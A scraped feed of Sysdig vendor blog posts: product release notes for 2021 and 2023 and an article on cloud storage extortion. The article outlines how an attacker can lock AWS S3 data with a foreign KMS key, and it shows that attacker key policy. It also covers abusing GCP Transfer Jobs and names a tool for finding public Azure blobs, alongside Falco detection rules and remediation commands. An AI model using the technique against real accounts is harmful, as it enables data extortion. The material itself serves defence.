This release only supports fresh installations of the Sysdig platform into your cloud or on-premises environment.

For the full supportability matrix, see the Release Notes. This repository also includes the on-prem Installation instructions.

Monitor

Sysdig has migrated to a Prometheus-native data store and is now available on on-premises deployments. This release adds several product offerings that are available on the Sysdig SaaS platform for the Monitor product. The following features are now available in the fresh installation of the 6.0.0 on-premises release.

Advisor
Dashboards
Explore
Alerts
Integrations

AWS Cloudwatch Metrics

Notification Channels

Two new notification channels have been added:

Secure

Insights

Sysdig Secure has introduced a powerful visualization tool for threat detection, investigation, and risk prioritization to help identify compliance anomalies and ongoing threats to your environment. With Insights, all findings generated by Sysdig across both workload and cloud environments are aggregated into a visual platform that streamlines threat detection and forensic analysis. For more information, see Insights.

Compliance

New report types have been added to Unified Compliance:

  • GCP
  • Azure
  • Kubernetes
  • Docker
  • Linux

Threat Detection Policies and Rules

Threat detection policies now have three “flavors,” following the same model in our SaaS platform.

  • Default/Managed Policies
  • Managed Ruleset Policies
  • Custom Policies

For information on the full description of these policy types, see in our Threat Detection Policies.

Integrations

Platform

Custom Roles

A custom role is an admin-defined role which allows Sysdig administrators to bundle a set of permissions and allocate it to one or more users or teams. This feature has been available in SaaS and is now released for our on-premises users. For more information, see Custom Roles.

Group Mappings

Group mappings allow you to connect groups from your identity provider (IdP) to the roles and teams associated with your Sysdig account.

Login Message

You can now configure a custom login message to help maintain security standards based on your organization.

Platform Audit

Sysdig provides both a UI and a set of APIs for auditing and reporting on the use of the Sysdig platform itself. By default, the UI is disabled to help minimize the required resources of running on-premises. The API is enabled by default. For more information, see Sysdig Platform Audit.

Privacy Settings

You can choose to opt in or out of sharing usage data with Sysdig.

Falco Rules Changelog

  • Added the following rules:
    • Kernel startup modules changed
    • Modify Timestamp attribute in File
    • Launch Code Compiler Tool in Container
    • Put Bucket ACL for AllUsers
    • Create Hardlink Over Sensitive Files
    • Azure Storage Account Created
    • Azure Storage Account Deleted
    • GCP Create Project
    • GCP Create Compute VM Instance
    • GCP Enable API
    • Create Bucket
    • Delete Bucket
    • Detect release_agent File Container Escapes
    • Java Process Class File Download
    • Launch Excessively Capable Container
    • Unprivileged Delegation of Page Faults Handling to a Userspace Processucket
  • Reduced false positives for the following rules:
    • Launch Package Management Process in Container
    • PTRACE anti-debug attempt
    • Linux Kernel Module Injection Detected
    • Launch Privileged Container
    • Reconnaissance attempt to find SUID binaries
    • Suspicious Operations with Firewalls
    • Linux Kernel Module Injection Detected
    • PTRACE attached to process
    • Read sensitive file untrusted
    • The docker client is executed in a container
    • Launch Privileged Container
    • Write below root
    • Schedule Cron Jobs
    • Suspicious Cron Modification
    • Launch Remote File Copy Tools in Container
    • Launch Suspicious Network Tool on Host
    • System procs activity
    • Modify Shell Configuration File
    • Write below etc
    • Launch Sensitive Mount Container
    • Mount Launched in Privileged Container
    • PTRACE attached to process
    • Clear Log Activities
    • Launch Package Management Process in Container
    • Container Run as Root User
    • Launch Remote File Copy Tools in Container
    • Launch Root User Container
    • Set Setuid or Setgid bit
    • Suspicious Cron Modification
    • Disallowed K8s User
    • The docker client is executed in a container
    • Launch Package Management Process in Container
    • Clear Log Activities
    • Launch Package Management Process in Container
    • Write below etc
    • Read sensitive file untrusted
    • PTRACE attached to process
    • Launch Excessively Capable Container
    • eBPF Program Loaded into Kernel
    • Read sensitive file untrusted
    • Non sudo setuid
    • Write below root
    • Read sensitive file untrusted
    • Write below rpm database
    • Launch Sensitive Mount Container
    • Launch Root User in Container
    • Non sudo setuid
    • Write below etc
    • Redirect STDOUT/STDIN to Network Connection in Container
    • Read ssh information
    • Clear Log Activities
    • Modify Shell Configuration File
    • System ClusterRole Modified/Deleted
      • Improved condition for the following rules:
        • Put Bucket Lifecycle
        • Execution of binary using ld-linux
        • Mount Launched in Privileged Container
        • Tampering with Security Software in Container
        • Launch Ingress Remote File Copy Tools in Container
        • Modify Timestamp attribute in File
      • Updated k8s image registry domains.
      • Updated the MITRE, GCP MITRE, and AWS MITRE tags.
      • Improved the falco_privileged_images list.
      • Updated IoCs Ruleset with new findings.
      • Added Falco rules versioning support.
      • Added an exception for the OpenSSL File Read or Write and for the outbound Connection to C2 Servers rule rule.

Our Falco team has been busy the last couple of months with multiple releases of new features. For more information on what has been released for the entire month of March and April, please review here.

New Website Resources

Blogs

Threat Research

Webinars

Tradeshows

Education

The Sysdig Training team provides curated, hands-on labs to learn and practice different topics. The selection of courses for the month of March:

The post What’s New in Sysdig – March & April 2023 appeared first on Sysdig.

]]>
Extortion in Cloud Storage https://sysdig.com/blog/extortion-in-cloud-storage/ Tue, 29 Nov 2022 16:30:00 +0000 https://sysdig.com/?p=62072 […] best practices to adopt in production. Google Cloud Platform ( GCP) Unlike AWS, GCP is not susceptible to the same […]

The post Extortion in Cloud Storage appeared first on Sysdig.

]]>
Extortion can simply be defined as “the practice of obtaining benefit through coercion. Data and cloud extortion schemes occur when precious data and/or access is stolen by an attacker that promises to restore it through payment or other demands.

In this article, we’ll cover some common or uncommon extortion schemes, and highlight ways to detect and avoid falling prey to demands.

First, an attacker needs to gain a foothold in an environment. This can be done in a variety of ways.

  • Vulnerabilities, such as Log4Shell or Spring4Shell, are often exploited to gain access.
  • Access keys and other tokens stored in source code.
  • Social Engineering to grant access or disclose access credentials and keys.
  • Malware that has infected a workstation can find stored credentials.

Simple user access within the environment may be sufficient to launch the attack. An attacker may need to further escalate privileges.

Amazon Web Services (AWS)

In AWS environments, Amazon Simple Storage Service (S3) buckets can have file encryption on a per-bucket or per-file basis. For encryption, you can use the AWS-provided key, your own custom key, or a key from another account. Generally, encryption can be changed at any time.

An attacker with access to a compromised account can take advantage of using encryption keys from another account to encrypt and lock out access to files on the account.

Cloud Extortion

First, the attacker creates a custom key on their AWS account. This may be from a disposable account for this sole purpose, or another compromised account to launch attacks from.

The attacker specifies which victim accounts to allow access to their malicious key. When describing the policy on the key, the attacker will remove kms:Decrypt and kms:DescribeKey from the policy. This will prevent the victim from being able to use the key to access their files, get information on the key, and remove their key from their files.

An attacker’s key policy might look like:

{
  "Sid": "Allow use of the key",
  "Effect": "Allow",
  "Principal": {
    "AWS": "arn:aws:iam:1234567890:root"
  },
  "Action": [
    "kms:Encrypt",
    "kms:ReEncrypt*",
    "kms:GenerateDataKey*"
  ],
  "Resource": "*"
},

Victims attempting to access their files will receive an “Access Denied” message when access has been locked out:

Cloud Extortion

Attempts to remove foreign keys from locked files can result in errors:

Cloud Extortion

Bucket versioning can help in this situation. Versioning is a feature of cloud storage to retain older copies of files and allow for rollback. By rolling back to a previous version of a file, account owners may be able to recover access to their files.

Detect extortion in AWS Storage

A smart attacker will want to disable bucket versioning and delete old copies of files. A Falco rule can alert account owners of attempts to disable bucket versioning, and such alerts should not be treated lightly. Rule “AWS S3 Versioning Disabled” will detect such attempts.

- rule: AWS S3 Versioning Disabled
  desc: Detect disabling of S3 bucket versioning.
  condition:
    aws.eventSource = "s3.amazonaws.com" and
    aws.eventName = "PutBucketVersioning" and
    jevt.value[/requestParameters/VersioningConfiguration/Status] = "Suspended" and
    not aws.errorCode exists
  output:
    The file versioning for a bucket has been disabled.
    (requesting user=%aws.user,
     requesting IP=%aws.sourceIP,
     AWS region=%aws.region,
     arn=%jevt.value[/userIdentity/arn],
     bucket name=%jevt.value[/requestParameters/bucketName])
  priority: WARNING
  source: aws_cloudtrail

To finally remove access to the victim’s previous keys, the attacker can schedule the deletion of the keys. Keys cannot be deleted immediately. Rather, there is a minimum seven day waiting period before a key is finally destroyed.

Account owners using Falco can be alerted with rule “Schedule Key Deletion” when keys are scheduled for deletion and take immediate action to remedy the situation.

- rule: Schedule Key Deletion
  desc: Detect scheduling of the deletion of a customer master key.
  condition:
    aws.eventName="ScheduleKeyDeletion" and not aws.errorCode exists
  output:
    A customer master key has been scheduled for deletion.
    (requesting user=%aws.user,
     requesting IP=%aws.sourceIP,
     AWS region=%aws.region,
     arn=%jevt.value[/userIdentity/arn],
     key id=%jevt.value[/requestParameters/keyId])
  priority: WARNING
  source: aws_cloudtrail

Once the encryption has been changed, rollback copies are deleted, and original keys are destroyed, the victim is subject to demands from an attacker to restore access to their data.

If you want to know more, check out the 26 AWS security best practices to adopt in production.

Google Cloud Platform (GCP)

Unlike AWS, GCP is not susceptible to the same encryption key switching extortion technique. Encryption is mandatory at the time of bucket creation and can be changed later, but not in a decrypted state or with a key from another account.

GCP users can use a Google-managed key or supply their own key. Keys apply to all files on the bucket uniformly, so there’s no exposure of per-file keys being changed.

Rather than using the key switching scheme described for AWS, attackers could use a slower method to lock out access. They need to move the files out of the bucket, delete old copies, and optionally upload encrypted versions of the files as placeholders. Attackers can manually download the files or create a Transfer Job to do the work for them.

Cloud Extortion

A Transfer Job is a function in GCP to copy data from one bucket to another, while optionally deleting the source files in the process. This can be used as a fast method for the attacker to steal data away from a victim. Once the files are transferred out and no longer available, the victim is subject to the whims of an attacker’s demands to get the data back.

Detect extortion in GCP Storage

Unfortunately for GCP users, the only audit log message of a Transfer Job being initiated is a storage.setIamPermissions method call to grant the storage-transfer-service.iam.gserviceaccount.com service account with roles/storage.objectAdmin permission to perform the transfer. It is vague and easily missed by watchful eyes.

A Falco rule “GCP Set Bucket IAM Policy” can detect this and similar policy changes to buckets.

- rule: GCP Set Bucket IAM Policy
  desc: Detect setting the permissions on an existing bucket using IAM policies.
  condition:
    gcp.methodName="storage.setIamPermissions" and
    jevt.value[/protoPayload/status]={}
  output:
    The permissions on an existing bucket have been set using IAM policies
    (requesting user=%gcp.user,
     requesting IP=%gcp.callerIP,
     region=%jevt.value[/protoPayload/resourceLocation/currentLocations/0],
     bucket=%jevt.value[/protoPayload/resourceName])
  priority: WARNING
  source: gcp_auditlog

Similar to AWS, GCP also implements bucket versioning for the entire bucket. If bucket versioning is disabled, files will retain prior versions but will not create new ones.

Unfortunately for account owners, when Object Versioning is disabled or file versions are deleted, GCP’s logging messages simply note an “unspecified bucket change” message. This makes it difficult to be notified of potentially hazardous changes. If a file is deleted by an attacker, all previous versions of the file would also be deleted after some time.

Find more tips in 24 Google Cloud Platform (GCP) security best practices using open source code.

Microsoft Azure

Azure offers “Storage Accounts” for file storage needs. A Storage Account (bucket) has blobs (files) of data that are stored in containers (directories). The terminology is a bit different, but it operates much the same as AWS and GCP.

Cloud Extortion

Azure does enable blob encryption by default with a key provided by Microsoft. Like GCP, Azure does not allow for the use of keys from foreign accounts.

Features like soft delete and file versioning can be used to help safeguard against attacks as described for AWS and GCP. However, Azure offers a feature that is not a benefit: storage accounts are publicly accessible with read access by default. This can unknowingly open Azure customers to data exposure.

Publicly accessible blobs can leak credentials, sensitive information like Personal Identifiable Information (PII), or other data that should remain private. Leaked information can be valuable to attackers simply by extorting the original owners to not further leak the information. Tools like MicroBurst by NetSPI can be used to scan and search for storage accounts open to anonymous access.

Detect extortion in Azure Storage

Falco users can use the rule “Azure Access Level for Blob Container Set to Public to alert on changes to storage account permissions.

- rule: Azure Access Level for Blob Container Set to Public
  desc: |
    Anonymous, public read access to a container and its blobs can be enabled in Azure Blob storage. It grants read-only access to these resources without sharing the account key, and without requiring a shared access signature. It is recommended not to provide anonymous access to blob containers until, and unless, it is strongly desired. A shared access signature token should be used for providing controlled and timed access to blob containers. If no anonymous access is needed on the storage account, it's recommended to set allowBlobPublicAccess false.
  condition:
    jevt.value[/operationName]="MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and
    jevt.value[/resultType]="Success" and
    jevt.value[/resultSignature]="Succeeded.OK" and
    jevt.value[/properties/responseBody] contains "\"allowBlobPublicAccess\":true"
  output:
    Anonymous access to blob containers has been allowed on storage account
    (requesting user=%jevt.value[/identity/claims/http:~1~1schemas.xmlsoap.org~1ws~12005~105~1identity~1claims~1name],
     storage account=%jevt.value[/resourceId])
  priority: WARNING
  source: azure_platformlogs

Public read access is enabled by default and should be disabled with the web interface or with the Azure command line interface (CLI). Here is how to use the Azure CLI to disable public access:

# First, gather a list of storage accounts.
az storage account list \
	--query '[*].name'
# For each result, use the returned value (as ACCOUNT_NAME) to get a list of containers
az storage container list \
	--account-name ACCOUNT_NAME \
	--query '[*].name'
# Now for each container name (as CONTAINER_NAME), check if public access is allowed.
az storage container show \
	--account-name ACCOUNT_NAME \
	--name CONTAINER_NAME \
	--query 'properties.publicAccess'
# Result should be 'container', 'blob', or nothing (meaning 'private' and no public access).
# Now for each result with 'container' or 'blob', disable public-access:
az storage container set-permission \
	--account-name ACCOUNT_NAME \
	--name CONTAINER_NAME \
	--public-access off

Summary

Understanding your cloud environment’s features is a key component in applying an effective security policy.

Extortion of cloud storage can easily be a greater cost than the cost of implementing a proper security posture. Keeping a watchful eye on your environment allows you to effectively respond to security events before they spiral out of control.

Combining a solution that ensures you are Cloud Security Posture management (CSPM) compliant with real-time detection that avoids wasting time reacting will make you prepared for any scenario.


Sysdig can help sift through long cloud logs to alert on potential security events as soon as possible, without the necessity of storing data lakes with huge costs.

In addition, Sysdig unifies cloud security posture management (CSPM) and cloud threat detection.

Learn more in the following articles:

The post Extortion in Cloud Storage appeared first on Sysdig.

]]>
What’s new in Sysdig – April 2021 https://sysdig.com/blog/whats-new-sysdig-april-2021/ Tue, 20 Apr 2021 15:06:22 +0000 https://sysdig.com/?p=37105&preview=true&preview_id=37105 […] for securing cloud infrastructure. Multi-Cloud Threat Detection for AWS and GCP Based on Falco: Sysdig adds support for cloud threat […]

The post What’s new in Sysdig – April 2021 appeared first on Sysdig.

]]>
Welcome to another monthly update on what’s new from Sysdig. Ramadan Kareem to all observing the holy month of Ramadan. Our team continues to work hard to bring great new features to all of our customers, automatically and for free! This last month was a big month for security with our release of Cloud Security Posture Management (CSPM), and we had lots of fun designing and releasing our new Cloud Chaos game!

The power of combined cloud and container security

Using different cloud and container security tools requires a manual correlation of logs to catch the breach and uncover the systems impacted. By unifying the incident timeline and adding risk-based insights, Sysdig reduces the time to detect threats across clouds and containers from weeks to hours. Cloud development teams can see exactly where the attacker started and each step they took as they moved through the environment.

Read “Cloud lateral movement: Breaking in through a vulnerable container” for more on the steps involved in this type of lateral cloud movement attack.

New continuous CSPM from Sysdig

Cloud security posture management for AWS based on Cloud Custodian: Sysdig adds cloud asset discovery, cloud services posture assessment, and compliance validation. Cloud security teams can manage their security posture by automatically discovering all cloud services, as well as flagging misconfigurations and violations of compliance and regulatory requirements. These new features are based on Cloud Custodian, an open source tool for securing cloud infrastructure.

Multi-Cloud Threat Detection for AWS and GCP Based on Falco: Sysdig adds support for cloud threat detection via GCP audit logs, in addition to the AWS CloudTrail integration from last year. Security teams can continuously detect suspicious activity or configuration changes across their infrastructure without relying on a periodic configuration check. Sophisticated attackers can take advantage of exposed configurations to access the cloud, then revert it immediately once inside. A static check could miss these changes, leaving openings for attackers, and also overlook indicators that an attacker has breached the environment.

Sysdig uses open source Falco, the Cloud Native Computing Foundation de facto runtime security project, and alerts based on continuously inspecting cloud audit logs. It performs the analysis within the user’s cloud account, which protects sensitive data and eliminates costs tied to exporting logs. Currently, there are more than 200 out-of-the-box CloudTrail rules, and the database continues to grow as Sysdig and the community contribute at a rate of 20-50 new rules per month.

All Sysdig events, including CSPM, compliance, container runtime, and AWS CloudTrail events can be sent to AWS Security Hub to allow security teams to respond to threats faster.

Cloud Risk Insights: Sysdig provides new visual insights across interconnected cloud and container security incidents, prioritized by risk levels. Sysdig reduces alert noise and provides instant visibility to see the entire cloud attack chain, from a hacker exploiting a container vulnerability and accessing the cloud, to elevating privileges and performing catastrophic actions, such as cryptomining on a Kubernetes cluster. Classifying incidents based on severity levels allows teams to prioritize what to investigate and respond to first. Teams can then investigate all suspicious activity performed by a user to see the breadth of impact and quickly begin incident response activities.

Free tier for cloud security

Sysdig is offering continuous cloud security for free, forever, for a single account. With easy onboarding, users can begin to manage cloud posture within minutes. The free tier includes a daily check against CIS benchmarks and continuous threat detection to ensure the cloud environments remains in a secure, compliant, and hardened state at all times. It also includes inline scanning for Fargate and ECR images, up to 250 images a month.

Open-standards approach to cloud security

Sysdig believes the future of security is open. Open source security delivers better security through faster innovation. Organizations can be confident they are adopting an accepted standard that will last. With this in mind, Sysdig chose to build its CSPM capabilities on top of Falco and Cloud Custodian. Sysdig selected the Cloud Custodian open source project because it has strong momentum in adoption, a rapidly growing database of rules, auto-remediation capabilities, and multi-cloud support.

Continue reading for more details on CSPM, as well as other new features that we have released this last month.

As always, please go checkout our own release notes for more details on product updates, and ping your local Sysdig contact if you have questions about anything covered in here.

Sysdig Secure

Sysdig Secure for cloud

Sysdig Secure for cloud is available with Cloud Risk Insights for AWS, Cloud Security Posture Management based on Cloud Custodian for AWS, and multi-cloud threat detection for AWS using Falco.

What’s Included in this release:

  • Insights: A powerful new visualization tool for threat detection, investigation, and risk prioritization, helping you identify compliance anomalies and ongoing threats to your environment. With Insights, all findings generated by Sysdig across both workload and cloud environments are aggregated into a visual platform that streamlines threat detection and forensic analysis.
  • Threat Detection based on AWS CloudTrail: To detect threats, anomalies, and suspicious activities with the flexible Falco engine. By leveraging AWS CloudTrail and the Falco language, you can detect any unexpected or unwanted behavior in your AWS accounts. Sysdig Cloud Connector leverages AWS CloudTrail as the source of truth for enabling governance, compliance, operational auditing, and risk auditing for your AWS account. Every API action over your infrastructure resources is recorded as a set of CloudTrail entries. Once the integration is deployed in your infrastructure, the Sysdig Cloud Connector can analyze these entries in real-time and provide AWS threat detection by filtering them against a flexible set of security rules. For more details, see the Sysdig Cloud Connector. Example detection rules include:
    • Attach a user to an Administrator Policy.
    • Create an HTTP Target Group without SSL.
    • Deactivate MFA for user access.
    • Delete S3 bucket encryption.
  • Cloud Security Posture Management with AWS Benchmarks: The AWS CIS Benchmarks assessment evaluates your AWS services against the benchmark requirements and returns the results and remediation activities you need to fix misconfigurations in your cloud environment. We’ve included several UI improvements to provide additional details, such as: control descriptions, affected resources, failing assets, and guided remediation steps, both manual and CLI-based.
  • Image Scanning for AWS ECR: One-click deployment using a CloudFormation template. Automatically scan images pushed to your Amazon Elastic Container Registry (ECR) using AWS-native technologies and Sysdig Secure. Sysdig image scanner integration is deployed as a CloudFormation template that listens to ECR registry events and uses AWS resources to streamline the image scanning process.
    • ECR itself will trigger the scan, no need for your CI/CD pipelines to actively pull from the registry.
    • Deployed in a few clicks, you just provide basic configuration parameters, such as the Sysdig API token or the Sysdig backend URL.
    • No need to configure registry scanning credentials on the Sysdig Secure side.
  • Image Scanning for AWS ECS & Fargate: One-click deployment using a CloudFormation template. Bringing the Sysdig Inline Scanning capabilities to automatically analyze the base images used for any task created using AWS Elastic Container Service (ECS or Fargate). Inline scanning living inside your AWS account means improved security:
    • No need to expose or configure private AWS registries.
    • Only image metadata is sent to Sysdig Secure, not the actual image contents.
    • No sensitive information ever leaves your AWS account.
    • An ephemeral task will be spawned to analyze each discovered image, in parallel.
    • Fully automated.
    • Scan results and scanning policies are still controlled from a single security governance point using Sysdig Secure.

How customers are using this

It’s no surprise that many Sysdig customers are container and Kubernetes users. Over the years, we’ve seen more and more people moving to managed container & Kubernetes platforms in cloud environments, and expanding their use of native cloud services. Our customers are now using these CSPM capabilities to extend the visibility and control that they had across their containerized applications into their whole cloud, and cloud native services. Our customers tell us this is allowing them to start thinking about tooling consolidation as well as providing a centralized view for all cloud consumers, including the security teams who often feel alienated by cloud native initiatives.

Free-forever cloud security tier

Sysdig is launching a new free-forever cloud security tier for one single account.

  • Easy onboarding in minutes.
  • Manage cloud posture with a daily run of CIS Benchmarks.
  • Detect threats with out-of-the-box CloudTrail detection rules based on Falco.
  • Scan containers (ECR/Fargate scanning) automatically and within your cloud environment for up to 250 images a month

How customers are using this

Many end-users we speak to that are considering Sysdig aren’t yet ready for a full tool, or they just need some simple use cases covered while they ramp up their cloud transformation and migration work. We’ve heard that while they are looking at the long-term picture, they still need something to help them with the short-term challenges and to start implementing some ‘quick wins.’ Our free tier is helping folks get a basic understanding of where they could improve their security, and start making those smaller improvements.

Image scanning reports v3 [BETA]

The Image Scanning Reports feature has been thoroughly updated and has moved from a synchronous model to an asynchronous mode, in which you schedule the reports you need and then receive them through your normal notification channels (e.g., email, Slack, webhook). The new version also includes:

  • A preview function to check report structure in the UI.
  • A more advanced query builder.
  • Extended set of data columns (e.g., CVSS base score and vector) and extended set of available filters (e.g., package type).

Reporting v3 supports two different types or reports:

  • Vulnerability report: Containing vulnerability, package, and image data. For example, vulnerabilities in my runtime with Severity ≥ High, a Fix available, and not included in a vuln exception list.
  • Policy report: Containing scanning policies and evaluated images data. For example, images in my internal registry failing the “NIST” scanning policy.

You need to enable this feature from the Sysdig Labs setting on the User Profile page.

How customers are using this

We’ve been listening to many customers ask for scheduled reports and the power to do complex reports that can take minutes if relying on real-time responses. Moving to asynchronous reporting has allowed the searching to be optimized and given customers more simplicity in the workflow. We’re hearing customers use these reports as part of their daily or weekly review tasks. They don’t need to leave their email inbox and can already start prioritizing security fixes and action new vulnerability notifications.

Feature enhancement: Falco policy types

Sysdig Secure has introduced Policy Types, a separation of policies into logical groups, based on the sources used in the policy engine. When creating a policy, you choose a type and then only the relevant scopes and container actions will be presented. We have also introduced a new policy type to support threat detection with AWS CloudTrail rules.

For full details, see Manage Policies.

How customers are using this

This has simplified the workflow for our customers. CSPM introduced a large number of new rules, so it has become important to allow users to quickly and visually filter through the policies to see the relevant policies for the task in hand. As they scale the usage, this becomes important for policies scoped and deployed across potentially thousands of hosts and dozens of cloud environments.

Sysdig Serverless Agent 1.0.0 for Fargate ECS

The “container-as-a-service” serverless environment calls for new agent models, and Sysdig provides them. Whereas in ECS, users still manage the underlying instances, with AWS Fargate the host is never visible and users simply run their workloads. And while this model is convenient, it can introduce risk as many people leave the containers unattended without monitoring security events that can exfiltrate secrets, compromise business data, impact performance, and increase AWS costs. In addition, it is impossible to install a standard agent in an environment where you do not have access to a host.

For these reasons, Sysdig has introduced a new “serverless agent” model that can be deployed in these container-based cloud environments. The first implementation is for Fargate (ECS).

Sysdig will be rolling out security features on the serverless agent over time. In v1.0.0, users will see:

  • Runtime Policies and Rules.
  • Secure Events.

To obtain secure event information, and the associated Falco policies and rules in the Sysdig Secure UI from a Fargate environment, users install the serverless agent using a CloudFormation Template. Then, log in to Sysdig Secure and review the events in the UI.

See also: AWS Fargate Serverless Agents.

How customers are using this

This provides Sysdig users with much needed visibility and control of their Fargate workloads. We’re seeing more people migrating to managed Kubernetes platforms, but they don’t want to compromise on the visibility they have when using a fully deployed variant. We’re hearing this helps accelerate the adoption of fully managed Kubernetes like Fargate, which comes with other advantages around operational efficiencies.

Falco rules

v0.12.1 is the latest version. Below is a diff of changes from v0.10.5, which we covered last month.

  • Fixed a defect that could prevent deploying rules to several older Sysdig backend versions.
  • Added new versions of falco_rules.yaml/k8s_audit_rules.yaml that use exceptions instead of collections of macros and long condition strings. The rules coverage should be identical to older versions.
  • Fixed minor problems with the rules installation script.
  • Added 164 rules that detect suspicious/anomalous/notable behavior from a stream of AWS CloudTrail events. This requires a Sysdig backend that supports policy types and running the Cloud Connector.
  • The new policy, Sysdig AWS Best Practices, includes 41 of the above rules that Sysdig recommends using for the AWS environments.

Sysdig Monitor

PromQL cheatsheet

Since releasing PromQL support in Sysdig Monitor, we’re seeing many customers make great use of this feature and leverage their existing Prometheus skills investments. Some fantastic use-cases are being built out and it’s great to see users get the most out of our native enterprise support. However, for every PromQL expert, there are 10 other users who haven’t used Prometheus before or don’t know where to start. We’re doing things to make the transition easier, including the release of a PromQL Cheatsheet to help folks get started. Whether you’re new to PromQL or just need a handy reference guide, this should be a really useful resource to have in your toolkit.

Download the PromQL CheatSheet!

Sysdig Agents

Sysdig Agent

The latest Sysdig Agent release is 11.1.2. Below is a diff of updates since 11.0.0, which we covered in our last update.

  • Enhanced Connection with Kubernetes API Server
    • Kubernetes reconnect logic has been improved to automatically back off (1 min, 2 min, 4 min… 1hr) if the connection is continuously dropped when using Thin Cointerface. This reduces the load that the agent imposes on the Kubernetes API Server in clusters with heavily burdened API servers.
  • Reduced Load on Kubernetes API Server
    • The agent’s readiness probe has been improved to not report ready until after the agent connects to the Kubernetes API server. This reduces the load that the agent imposes on the Kubernetes API server when starting up during RollingUpdate.
  • Agent Reports Memory Usage Accurately for Containers
    • Fixed an issue where the agent would incorrectly report memory.bytes.used for containers that use more than 4GB.
  • Runtime Policies Work as Expected
    • The runtime policies that have a policy type and capture action are handled as expected.
  • Agent Tags in Policy Scopes
    • Agent tags are supported in runtime policy scopes.
  • Metric Limits Are Updated As Expected
    • Fixed a problem where metric limits were not updated from the defaults. This is unlikely to happen if agents are connected to the SaaS backend.
  • Configured Tags in Prometheus Scraper
    • Fixed a problem in the old Prometheus scraper (used when promscrape is disabled) to ensure that configured tags are properly added to the metrics.
  • JMX Metrics for Short-Lived Java Processes
    • Fixed an issue where short-lived Java processes could cause the Sysdig Agent to stop collecting JMX metrics.
  • Misconfiguration No Longer Leads to Agent Constantly Querying Kubernetes API Server
    • Fixed a problem where the agent would continuously send requests to the Kubernetes API server to query the endpoints API. This occurs when the agent’s clusterrole is incorrectly configured. With this fix, the agent will no longer repeat the attempt if it is unable to connect to the Kubernetes API during boot.
  • Scope Runtime Policies
    • The runtime policies are now correctly scoped by kubernetes.cluster.name. The fix in 10.6.0 was incomplete.
  • Agent Correctly Reports Replicasets
    • Fixed an issue where the agent could lose track of a replicaset and report incomplete metadata.
  • Agent Issues Over HTTP Proxy
    • Fixed an agent connection issue over plaintext HTTP proxy with encryption.
    • Fixed an agent connection issue via HTTP proxy connections over SSL.

Sysdig Serverless Agent

Introduced this last month, the current version is v1.0.0.

The “container-as-a-service” serverless environment calls for new agent models, and Sysdig provides them. Whereas in ECS, users still manage the underlying instances, with AWS Fargate the host is never visible and users simply run their workloads. And while this model is convenient, it can introduce risk as many people leave the containers unattended without monitoring security events that can exfiltrate secrets, compromise business data, impact performance, and increase AWS costs. In addition, it is impossible to install a standard agent in an environment where you do not have access to a host.

For these reasons, Sysdig has introduced a new “serverless agent” model that can be deployed in these container-based cloud environments. The first implementation is for Fargate (ECS).

Sysdig will be rolling out security features on the serverless agent over time. In v1.0.0, users will see:

  • Runtime Policies and Rules
  • Secure Events

To obtain secure event information, and the associated Falco policies and rules in the Sysdig Secure UI from a Fargate environment, users install the serverless agent using a CloudFormation Template. Then, log in to Sysdig Secure and review the events in the UI.

See also: AWS Fargate Serverless Agents.

Sysdig Agent – Helm chart

The Helm Chart 1.11.11 is the latest version. Below is a diff of updates since v1.11.7, which we covered in our last update.

  • Use the latest image for Sysdig Agent (11.1.2).
  • Fix in the imageanalyzer extravolumes.
  • Improvements and fixes in README for installation instructions (use sysdig-agent namespace by default).

Node image analyzer

Version 0.1.11 was released, and contains the following diff updates since v0.1.10, which we covered in our last update.

  • Fixed a bug that prevented the Origin field from being populated on the UI for images analyzed by NIA on containerd environments.
  • Fixed an issue that resulted in some unscanned images with “unknown media type during manifest conversion” error logs on containerd environments.
  • Fixed an issue that caused the NIA container to report “unhealthy” status.

Node image analyzer can be installed as part of the Sysdig Agent install.

Inline scanning engine

Version 2.3.2 is still the latest release, which we covered in our last update.

See also: Integrate with CI/CD Tools.

SDK, CLI and Tools

Sysdig CLI

v0.7.8 is the latest release. Below is a diff of updates since v0.7.5, which we covered in our last update.

  • Add runtime security policy types support (as discussed in the Secure section above).
  • Update sdc-cli event get to use the get_event method in SDK (This allows the retrieval of an event via its ID even if it’s very old).
  • Add dashboard import from PromCat format.
  • Allow restore policy type from backups.

See also: Sysdig CLI page.

Python SDK

v0.15.1 is the latest release. Below is a diff of updates since v0.14.13, which we covered in our last update.

  • Add get_event by ID method to Events client v1 and v2.
  • Add policy types support (as discussed in the Secure section above).
  • Add delete_sysdig_capture method.
  • Add user provisioning without email confirmation.

Terraform provider

v0.5.14 has been released. Below are the diff changes from v0.5.11, which we covered last month:

  • Allow to use aws_cloudtrail policies.
  • Add policy types support (as discussed in the Secure section above).
  • Add Falco rule type ‘aws_cloudtrail‘.
  • trigger_after_pct not handled correctly in sysdig_monitor_alert_downtime resource.

See also: Sysdig Terraform provider documentation.

Falco VS Code extension

v0.1.0 is still the latest release.

Sysdig Cloud Connector

v0.6.4 was released. Below is a diff of updates since v0.5.1, which we covered last month:

  • When the loader finds a duplicated rule/macro/list, override it.
  • Allow rules exceptions when validating.
  • Added CIS GCP Foundation Benchmark rules for Virtual Machines.
  • Added CIS GCP Foundation Benchmark rules for Networks and DNS.
  • Added CIS GCP Foundation Benchmark rules for LOGGING (sinks).
  • Enable Secure integrations by default.
  • Enable sending the header with the account ID to Secure.
  • Added CIS GCP Foundation Benchmark rules for IAM and APIKEYS.
  • Use aws.* fields instead of plain jevt on rules.
  • Added “@type“-like compatibility to jsonpath in rule files.
  • breaking change: Add support for ‘@’ character in jevt.event rules (currently Falco OSS implementation does not support this, but we do need it for the GCP accounts).
  • When segment key is not specified, return an error.
  • GCP Rules for: Describe Instance, Super Admin Executing command.
  • GCP Rules for: Buckets.
  • Add gcp.user and gcp.callerIp to GCP events scope.
  • Add gcp.location to GCP events scope.
  • Add default notifiers (metrics, console, and tracking) to cloud-scanning.
  • Allow query scopes using the event getField.
  • Show rule name alongside policy name on Secure Event Feed.
  • Do not exit when loading rules on incorrect order, but log it.
  • Filter out unneeded logs on auditlog.
  • Integrate with Secure Account Registration.
  • Add pagination to the gcp logging reader.
  • Add policy_id to the event in secure.
  • Notifiers set the event timestamp to the event occurrence date instead of alert creation.
  • rules-validator: Only print error info on error.
  • Update AWS SDK to v2.
  • Use the same args/output than OSS Falco in rules validator.
  • rules-validator: Allow empty files.
  • Filter events on the pipeline according to the Secure settings.
  • Add GCP Stackdriver notifier.
  • Allow specifying the log level.
  • New ECS Exec rules.
  • Display the Falco rule name in the event for Sysdig Secure, in addition to policy.
  • Ignore non-aws_cloudtrail rules when validating.
  • Include build and version info.
